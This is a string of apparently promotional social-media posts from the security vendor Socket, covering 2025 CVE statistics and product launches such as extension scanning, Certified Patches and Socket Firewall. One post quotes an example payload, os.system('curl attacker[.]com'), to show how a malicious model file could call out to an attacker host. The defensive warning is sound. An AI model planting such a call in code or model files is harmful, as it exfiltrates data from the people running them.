The November bar stands out. It’s down sharply compared to November 2024.

The visual makes the dip feel dramatic, but this isn’t a signal of lower risk. It’s a signal of slower publishing by a few major CNAs.

CVE volume is ahead of last year, even with a small dip in November.

42,697 CVEs through Nov 30, running 16.9 percent higher than 2024.

The chart makes it obvious how steady the upward curve has been all year. The overall trend is sustained growth in disclosures.

Webhooks for Alert Changes just dropped 🎉

No more refreshing dashboards. Socket now pushes every new, updated, or cleared alert straight into your workflow in real time.

Perfect way to wrap Launch Week: Ruby reachability, Certified Patches, Bun/vlt, OpenVSX… and now this ⚡️

IDE extensions are a silent nightmare.

VS Code extensions get full access to your code and creds, and attackers have already slipped malware into VS Code Marketplace and OpenVSX.

So Socket now scans OpenVSX extensions before they ever hit your machine. 🔍⚡️

🚀 Big news for JavaScript teams: Socket now supports Bun and vlt in beta.

You no longer have to choose between innovation and security. Commit a bun.lock or vlt-lock.json and Socket gives you full supply chain protection.

🚀 Day Two of Socket Launch Week!

We’re launching @socket.dev Certified Patches—a new way to eliminate vulnerabilities instantly without upgrading your package versions or pulling in risky new code.

Tiny, human-reviewed fixes that give teams a clean path to zero exploitable CVEs.

1/ Ruby teams, this one’s for you 🔥

Today we’re launching Reachability for Ruby in beta. It identifies which Ruby vulnerabilities are actually exploitable in your app… and which ones are just noise.

Today, we’re launching Socket Firewall Enterprise — built to stop malicious packages before they ever reach your apps or developer systems.

You’d never clone a random repo and give it your production keys… But that’s literally what your GitHub Actions do every time they run.

Think about it — your GitHub Actions pipeline pulls in random code straight from the internet, runs it with full access to secrets, tokens, everything.

1️⃣ Static analysis (SAST) for 14 languages — finds real code issues like command injection or unsafe deserialization before they land.

2️⃣ Secrets detection — catches leaked API keys before they’re merged.

3️⃣ Container scanning — checks Dockerfiles + images for risky configs and outdated base images.

4️⃣
You can scan models today via our API using a "package URL" or PURL like: pkg:huggingface/...

Or upload an AIBOM (AI Bill of Materials) from CycloneDX. Socket will analyze all the models it references for malware and supply chain risk.

3️⃣
Developers already know: Pickle, TensorFlow, GGUF, and Llamafile can execute code when loaded.

That means a random model from the internet could be quietly running os.system("curl attacker[.]com") in your env.

We’ve already seen payloads hiding in models exfiltrating data, spawning shells.

2️⃣
Socket now scans Hugging Face model files for:
– Deserialization exploits
– Lambda layer injections
– Llamafile runtime malware
– GGUF template backdoors

If a model contains code that can hijack your system, you’ll know before it ever runs. ⚡️

🚨 Open source supply chain attacks are exploding.

Starting today, that ends.

We’re releasing Socket Firewall — FREE, zero-config, CLI that blocks malware before it lands on your laptop or CI.

Just run:

npm i -g sfw
sfw npm install lodash

Works for: npm, yarn, pnpm, pip, uv, and cargo.

DJ Khaled on compromised NPM packages

3️⃣ It’s all live in the UI 🖱️ and the API 🧪

So whether you’re a clicker or a scripter 🧑‍💻 — you’re covered.

This is a public beta 🚧 Available NOW ⏰

Tell us what you love — and what’s broken 🛠️

1️⃣ You can now tag your repos with custom labels:

• frontend 🎨
• infra ⚙️
• legacy 🪦
• team-red 🟥

Whatever fits your mental model 🧠.

Finally, a sane way to bring order to repo chaos.